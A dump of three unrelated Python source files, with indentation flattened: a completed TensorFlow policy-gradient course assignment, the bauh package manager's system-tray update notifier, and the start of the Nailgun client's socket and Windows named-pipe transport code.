# YOUR CODE HERE
# Placeholder for advantage, shape is None so that it can be 1d of variable length
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
# YOUR_CODE_HERE
y_out = build_mlp(sy_ob_no, self.ac_dim, "scope", self.n_layers, self.size)
if self.discrete:
# Logits are direct output of network
sy_logits_na = y_out
return sy_logits_na
else:
# Mean is learned by dense-net, logstddev is learned alone
sy_mean = y_out
sy_logstd = tf.get_variable(initializer=tf.zeros_initializer, shape=[self.ac_dim], name='logstd')
return (sy_mean, sy_logstd)
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
            # tf.multinomial draws one action index per row from the categorical distribution defined by the logits
sy_sampled_ac = tf.multinomial(sy_logits_na, 1)
# flatten
sy_sampled_ac = tf.reshape(sy_sampled_ac, [-1])
else:
sy_mean, sy_logstd = policy_parameters
# According to function above
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean))
return sy_sampled_ac
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
## softmax crossentropy gives log probability
sy_logprob_n = -tf.nn.sparse_softmax_cross_entropy_with_logits(labels=sy_ac_na, logits=sy_logits_na)
else:
# Likelihood of chosen action
sy_mean, sy_logstd = policy_parameters
# multivariate gaussian
dist = tf.contrib.distributions.MultivariateNormalDiag(loc=sy_mean,
scale_diag=tf.exp(sy_logstd))
# log prob of said gaussian
sy_logprob_n = dist.log_prob(sy_ac_na)
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
#========================================================================================#
# ----------PROBLEM 2----------
# Loss Function and Training Operation
#========================================================================================#
# Gradient descent with logprob and advantage
loss = -tf.reduce_mean(tf.multiply(self.sy_logprob_n, self.sy_adv_n))
self.update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(loss)
#========================================================================================#
# ----------PROBLEM 6----------
# Optional Baseline
#
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
#========================================================================================#
if self.nn_baseline:
self.baseline_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_baseline",
n_layers=self.n_layers,
size=self.size))
# YOUR_CODE_HERE
# Target is learnable parameter
self.sy_target_n = tf.placeholder(shape=[None], name="target_n", dtype=tf.float32)
# Regular l2 loss
baseline_loss = tf.nn.l2_loss(self.baseline_prediction - self.sy_target_n)
self.baseline_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(baseline_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
            animate_this_episode = (len(paths) == 0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards = [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
# Run action sampling
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no : [ob]})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
break
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32)}
return path
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
def sum_of_rewards(self, re_n):
"""
Monte Carlo estimation of the Q function.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
----------------------------------------------------------------------------------
Your code should construct numpy arrays for Q-values which will be used to compute
advantages (which will in turn be fed to the placeholder you defined in
Agent.define_placeholders).
Recall that the expression for the policy gradient PG is
PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
where
tau=(s_0, a_0, ...) is a trajectory,
Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
and b_t is a baseline which may depend on s_t.
You will write code for two cases, controlled by the flag 'reward_to_go':
Case 1: trajectory-based PG
(reward_to_go = False)
Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
entire trajectory (regardless of which time step the Q-value should be for).
For this case, the policy gradient estimator is
E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
where
Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
Thus, you should compute
Q_t = Ret(tau)
Case 2: reward-to-go PG
(reward_to_go = True)
Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
from time step t. Thus, you should compute
Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
like the 'ob_no' and 'ac_na' above.
"""
# YOUR_CODE_HERE
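        # Worked example (hypothetical numbers): for one path with rewards [1, 1, 1] and
        # gamma = 0.5, the reward-to-go values are [1.75, 1.5, 1.0]; with reward_to_go=False
        # every timestep instead gets the full discounted return 1.75.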
q_n = []
for path in re_n:
q = 0
q_path = []
# Dynamic programming over reversed path
for rew in reversed(path):
q = rew + self.gamma * q
q_path.append(q)
q_path.reverse()
if not self.reward_to_go:
q_path = [q_path[0]] * len(q_path)
q_n.extend(q_path)
return q_n
def compute_advantage(self, ob_no, q_n):
"""
Computes advantages by (possibly) subtracting a baseline from the estimated Q values
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Computing Baselines
#====================================================================================#
if self.nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current batch of Q-values. (Goes with Hint
            #                 #bl2 in Agent.update_parameters.)
# predict baseline
b_n = self.sess.run(self.baseline_prediction, feed_dict={self.sy_ob_no : ob_no})
# normalize baseline as per comments above
b_n = normalize(b_n, np.mean(q_n), np.std(q_n))
# advantage is total rewards minus baseline
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
return adv_n
def estimate_return(self, ob_no, re_n):
"""
Estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
q_n = self.sum_of_rewards(re_n)
adv_n = self.compute_advantage(ob_no, q_n)
#====================================================================================#
# ----------PROBLEM 3----------
# Advantage Normalization
#====================================================================================#
if self.normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
adv_n = normalize(adv_n)
return q_n, adv_n
def update_parameters(self, ob_no, ac_na, q_n, adv_n):
"""
Update the parameters of the policy and (possibly) the neural network baseline,
which is trained to approximate the value function.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Optimizing Neural Network Baseline
#====================================================================================#
if self.nn_baseline:
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 in
# Agent.compute_advantage.)
# YOUR_CODE_HERE
q_n = normalize(q_n)
_ = self.sess.run(self.baseline_update_op, feed_dict={
self.sy_ob_no : ob_no,
self.sy_target_n: q_n})
#====================================================================================#
# ----------PROBLEM 3----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
_ = self.sess.run(self.update_op, feed_dict={
self.sy_ob_no: ob_no,
self.sy_ac_na: ac_na,
self.sy_adv_n: adv_n})
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
reward_to_go,
animate,
logdir,
normalize_advantages,
nn_baseline,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
env = gym.wrappers.Monitor(
env,
'records/' + env_name,
force=True,
video_callable=lambda episode_id: episode_id%1000==0)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or self.discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'reward_to_go': reward_to_go,
'nn_baseline': nn_baseline,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args)
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = [path["reward"] for path in paths]
q_n, adv_n = agent.estimate_return(ob_no, re_n)
agent.update_parameters(ob_no, ac_na, q_n, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
env.close()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
        # Awkward hacky process runs, because TensorFlow does not like
        # repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
systray.py
|
import time
from io import StringIO
from threading import Lock, Thread
from typing import List
from PyQt5.QtCore import QThread, pyqtSignal, QCoreApplication, Qt
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QSystemTrayIcon, QMenu
from bauh import __app_name__
from bauh.api.abstract.controller import SoftwareManager
from bauh.api.abstract.model import PackageUpdate
from bauh.view.util import util, resource
from bauh.view.qt.about import AboutDialog
from bauh.view.qt.window import ManageWindow
class UpdateCheck(QThread):
signal = pyqtSignal(list)
def __init__(self, manager: SoftwareManager, check_interval: int, parent=None):
super(UpdateCheck, self).__init__(parent)
self.check_interval = check_interval
self.manager = manager
def run(self):
while True:
updates = self.manager.list_updates()
self.signal.emit(updates)
time.sleep(self.check_interval)
class TrayIcon(QSystemTrayIcon):
def __init__(self, i18n: dict, manager: SoftwareManager, manage_window: ManageWindow, check_interval: int = 60, update_notification: bool = True):
super(TrayIcon, self).__init__()
self.i18n = i18n
self.manager = manager
self.icon_default = QIcon(resource.get_path('img/logo.png'))
self.icon_update = QIcon(resource.get_path('img/logo_update.png'))
self.setIcon(self.icon_default)
self.menu = QMenu()
self.action_manage = self.menu.addAction(self.i18n['tray.action.manage'])
self.action_manage.triggered.connect(self.show_manage_window)
self.action_about = self.menu.addAction(self.i18n['tray.action.about'])
self.action_about.triggered.connect(self.show_about)
self.action_exit = self.menu.addAction(self.i18n['tray.action.exit'])
self.action_exit.triggered.connect(lambda: QCoreApplication.exit())
self.setContextMenu(self.menu)
self.manage_window = None
self.dialog_about = None
self.check_thread = UpdateCheck(check_interval=check_interval, manager=self.manager)
self.check_thread.signal.connect(self.notify_updates)
self.check_thread.start()
self.last_updates = set()
self.update_notification = update_notification
self.lock_notify = Lock()
self.activated.connect(self.handle_click)
self.set_default_tooltip()
self.manage_window = manage_window
def set_default_tooltip(self):
self.setToolTip('{} ({})'.format(self.i18n['manage_window.title'], __app_name__).lower())
def handle_click(self, reason):
if reason == self.Trigger:
self.show_manage_window()
def verify_updates(self, notify_user: bool = True):
Thread(target=self._verify_updates, args=(notify_user,)).start()
def _verify_updates(self, notify_user: bool):
self.notify_updates(self.manager.list_updates(), notify_user=notify_user)
def notify_updates(self, updates: List[PackageUpdate], notify_user: bool = True):
self.lock_notify.acquire()
try:
if len(updates) > 0:
update_keys = {'{}:{}:{}'.format(up.type, up.id, up.version) for up in updates}
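                # each key has the form '<type>:<id>:<version>', so a version bump shows up as a new update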
new_icon = self.icon_update
if update_keys.difference(self.last_updates):
self.last_updates = update_keys
n_updates = len(updates)
ups_by_type = {}
for key in update_keys:
ptype = key.split(':')[0]
count = ups_by_type.get(ptype)
count = 1 if count is None else count + 1
ups_by_type[ptype] = count
msg = StringIO()
msg.write(self.i18n['notification.update{}'.format('' if n_updates == 1 else 's')].format(n_updates))
if len(ups_by_type) > 1:
for ptype, count in ups_by_type.items():
msg.write('\n * {} ( {} )'.format(ptype.capitalize(), count))
msg.seek(0)
msg = msg.read()
self.setToolTip(msg)
if self.update_notification and notify_user:
util.notify_user(msg=msg)
else:
self.last_updates.clear()
new_icon = self.icon_default
self.set_default_tooltip()
if self.icon().cacheKey() != new_icon.cacheKey(): # changes the icon if needed
self.setIcon(new_icon)
finally:
self.lock_notify.release()
def show_manage_window(self):
if self.manage_window.isMinimized():
self.manage_window.setWindowState(Qt.WindowNoState)
elif not self.manage_window.isVisible():
self.manage_window.refresh_apps()
self.manage_window.show()
def show_about(self):
if self.dialog_about is None:
self.dialog_about = AboutDialog(self.i18n)
if self.dialog_about.isHidden():
self.dialog_about.show()
|
ng.py
|
#!/usr/bin/env python
#
# Copyright 2004-2015, Martian Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import ctypes
import platform
import optparse
import os
import time
import os.path
import tempfile
import select
import socket
import struct
import sys
from threading import Condition, Event, Thread, RLock
from subprocess import CalledProcessError, check_call
is_py2 = sys.version[0] == "2"
if is_py2:
import Queue as Queue
import __builtin__ as builtin
def to_bytes(s):
return s
else:
import queue as Queue
import builtins as builtin
from io import UnsupportedOperation
    def to_bytes(s):
        # accept str or bytes so raw file chunks (e.g. from --nailgun-filearg) pass through unchanged
        return s if isinstance(s, bytes) else bytes(s, "utf-8")
def bytes_to_str(bytes_to_convert):
"""Version independent way of converting bytes to string."""
return bytes_to_convert if is_py2 else bytes_to_convert.decode("utf-8")
# @author <a href="http://www.martiansoftware.com/contact.html">Marty Lamb</a>
# @author Pete Kirkham (Win32 port)
# @author Sergey Balabanov, Ben Hamilton (Python port)
#
# Please try to keep this working on Python 2.6.
NAILGUN_VERSION = "0.9.3"
BUFSIZE = 2048
NAILGUN_PORT_DEFAULT = 8212
CHUNK_HEADER_LEN = 5
THREAD_TERMINATION_TIMEOUT_SEC = 0.5
STDIN_BUFFER_LINE_SIZE = 10
CHUNKTYPE_STDIN = b"0"
CHUNKTYPE_STDOUT = b"1"
CHUNKTYPE_STDERR = b"2"
CHUNKTYPE_STDIN_EOF = b"."
CHUNKTYPE_ARG = b"A"
CHUNKTYPE_LONGARG = b"L"
CHUNKTYPE_ENV = b"E"
CHUNKTYPE_DIR = b"D"
CHUNKTYPE_CMD = b"C"
CHUNKTYPE_EXIT = b"X"
CHUNKTYPE_SENDINPUT = b"S"
CHUNKTYPE_HEARTBEAT = b"H"
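# Wire format note: every chunk on the socket starts with a 5-byte header (a 4-byte big-endian
# payload length plus a 1-byte chunk-type code from the list above, matching the ">ic" struct
# format used below), followed by the payload itself.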
NSEC_PER_SEC = 1000000000
DEFAULT_HEARTBEAT_INTERVAL_SEC = 0.5
SELECT_MAX_BLOCK_TIME_SEC = 1.0
SEND_THREAD_WAIT_TERMINATION_SEC = 5.0
# We need to support Python 2.6 hosts which lack memoryview().
HAS_MEMORYVIEW = "memoryview" in dir(builtin)
EVENT_STDIN_CHUNK = 0
EVENT_STDIN_CLOSED = 1
EVENT_STDIN_EXCEPTION = 2
class NailgunException(Exception):
SOCKET_FAILED = 231
CONNECT_FAILED = 230
UNEXPECTED_CHUNKTYPE = 229
CONNECTION_BROKEN = 227
def __init__(self, message, code):
self.message = message
self.code = code
def __str__(self):
return self.message
class Transport(object):
def close(self):
raise NotImplementedError()
def sendall(self, data):
raise NotImplementedError()
def recv(self, size):
raise NotImplementedError()
def recv_into(self, buffer, size=None):
raise NotImplementedError()
def select(self, timeout_secs):
raise NotImplementedError()
class UnixTransport(Transport):
def __init__(self, __socket):
self.__socket = __socket
self.recv_flags = 0
self.send_flags = 0
if hasattr(socket, "MSG_WAITALL"):
self.recv_flags |= socket.MSG_WAITALL
if hasattr(socket, "MSG_NOSIGNAL"):
self.send_flags |= socket.MSG_NOSIGNAL
def close(self):
return self.__socket.close()
def sendall(self, data):
result = self.__socket.sendall(data, self.send_flags)
return result
def recv(self, nbytes):
return self.__socket.recv(nbytes, self.recv_flags)
def recv_into(self, buffer, nbytes=None):
return self.__socket.recv_into(buffer, nbytes, self.recv_flags)
def select(self, timeout_secs):
select_list = [self.__socket]
readable, _, exceptional = select.select(
select_list, [], select_list, timeout_secs
)
return (self.__socket in readable), (self.__socket in exceptional)
if os.name == "nt":
import ctypes.wintypes
wintypes = ctypes.wintypes
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_FLAG_OVERLAPPED = 0x40000000
OPEN_EXISTING = 3
INVALID_HANDLE_VALUE = ctypes.c_void_p(-1).value
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
FORMAT_MESSAGE_ALLOCATE_BUFFER = 0x00000100
FORMAT_MESSAGE_IGNORE_INSERTS = 0x00000200
WAIT_FAILED = 0xFFFFFFFF
WAIT_TIMEOUT = 0x00000102
WAIT_OBJECT_0 = 0x00000000
WAIT_IO_COMPLETION = 0x000000C0
INFINITE = 0xFFFFFFFF
# Overlapped I/O operation is in progress. (997)
ERROR_IO_PENDING = 0x000003E5
ERROR_PIPE_BUSY = 231
# The pointer size follows the architecture
# We use WPARAM since this type is already conditionally defined
ULONG_PTR = ctypes.wintypes.WPARAM
class OVERLAPPED(ctypes.Structure):
_fields_ = [
("Internal", ULONG_PTR),
("InternalHigh", ULONG_PTR),
("Offset", wintypes.DWORD),
("OffsetHigh", wintypes.DWORD),
("hEvent", wintypes.HANDLE),
]
LPDWORD = ctypes.POINTER(wintypes.DWORD)
CreateFile = ctypes.windll.kernel32.CreateFileW
CreateFile.argtypes = [
wintypes.LPCWSTR,
wintypes.DWORD,
wintypes.DWORD,
wintypes.LPVOID,
wintypes.DWORD,
wintypes.DWORD,
wintypes.HANDLE,
]
CreateFile.restype = wintypes.HANDLE
CloseHandle = ctypes.windll.kernel32.CloseHandle
CloseHandle.argtypes = [wintypes.HANDLE]
CloseHandle.restype = wintypes.BOOL
ReadFile = ctypes.windll.kernel32.ReadFile
ReadFile.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
ctypes.POINTER(OVERLAPPED),
]
ReadFile.restype = wintypes.BOOL
WriteFile = ctypes.windll.kernel32.WriteFile
WriteFile.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
ctypes.POINTER(OVERLAPPED),
]
WriteFile.restype = wintypes.BOOL
GetLastError = ctypes.windll.kernel32.GetLastError
GetLastError.argtypes = []
GetLastError.restype = wintypes.DWORD
SetLastError = ctypes.windll.kernel32.SetLastError
SetLastError.argtypes = [wintypes.DWORD]
SetLastError.restype = None
FormatMessage = ctypes.windll.kernel32.FormatMessageW
FormatMessage.argtypes = [
wintypes.DWORD,
wintypes.LPVOID,
wintypes.DWORD,
wintypes.DWORD,
ctypes.POINTER(wintypes.LPCWSTR),
wintypes.DWORD,
wintypes.LPVOID,
]
FormatMessage.restype = wintypes.DWORD
LocalFree = ctypes.windll.kernel32.LocalFree
GetOverlappedResult = ctypes.windll.kernel32.GetOverlappedResult
GetOverlappedResult.argtypes = [
wintypes.HANDLE,
ctypes.POINTER(OVERLAPPED),
LPDWORD,
wintypes.BOOL,
]
GetOverlappedResult.restype = wintypes.BOOL
CreateEvent = ctypes.windll.kernel32.CreateEventW
CreateEvent.argtypes = [LPDWORD, wintypes.BOOL, wintypes.BOOL, wintypes.LPCWSTR]
CreateEvent.restype = wintypes.HANDLE
PeekNamedPipe = ctypes.windll.kernel32.PeekNamedPipe
PeekNamedPipe.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
LPDWORD,
LPDWORD,
]
PeekNamedPipe.restype = wintypes.BOOL
WaitNamedPipe = ctypes.windll.kernel32.WaitNamedPipeW
WaitNamedPipe.argtypes = [wintypes.LPCWSTR, wintypes.DWORD]
WaitNamedPipe.restype = wintypes.BOOL
def _win32_strerror(err):
""" expand a win32 error code into a human readable message """
# FormatMessage will allocate memory and assign it here
buf = ctypes.c_wchar_p()
FormatMessage(
FORMAT_MESSAGE_FROM_SYSTEM
| FORMAT_MESSAGE_ALLOCATE_BUFFER
| FORMAT_MESSAGE_IGNORE_INSERTS,
None,
err,
0,
buf,
0,
None,
)
try:
return buf.value
finally:
LocalFree(buf)
class WindowsNamedPipeTransport(Transport):
""" connect to a named pipe """
def __init__(self, sockpath):
self.sockpath = u"\\\\.\\pipe\\{0}".format(sockpath)
while True:
self.pipe = CreateFile(
self.sockpath,
GENERIC_READ | GENERIC_WRITE,
0,
None,
OPEN_EXISTING,
FILE_FLAG_OVERLAPPED,
None,
)
err1 = GetLastError()
msg = _win32_strerror(err1)
if self.pipe != INVALID_HANDLE_VALUE:
break
if err1 != ERROR_PIPE_BUSY:
self.pipe = None
raise NailgunException(msg, NailgunException.CONNECT_FAILED)
if not WaitNamedPipe(self.sockpath, 5000):
self.pipe = None
raise NailgunException(
"time out while waiting for a pipe", NailgunException.CONNECT_FAILED
)
# event for the overlapped I/O operations
self.read_waitable = CreateEvent(None, True, False, None)
if self.read_waitable is None:
raise NailgunException(
"CreateEvent failed", NailgunException.CONNECT_FAILED
)
self.write_waitable = CreateEvent(None, True, False, None)
if self.write_waitable is None:
raise NailgunException(
"CreateEvent failed", NailgunException.CONNECT_FAILED
)
def _raise_win_err(self, msg, err):
raise IOError("%s win32 error code: %d %s" % (msg, err, _win32_strerror(err)))
def close(self):
if self.pipe:
CloseHandle(self.pipe)
self.pipe = None
if self.read_waitable is not None:
CloseHandle(self.read_waitable)
self.read_waitable = None
if self.write_waitable is not None:
CloseHandle(self.write_waitable)
self.write_waitable = None
def recv_into(self, buffer, nbytes):
# we don't use memoryview because OVERLAPPED I/O happens
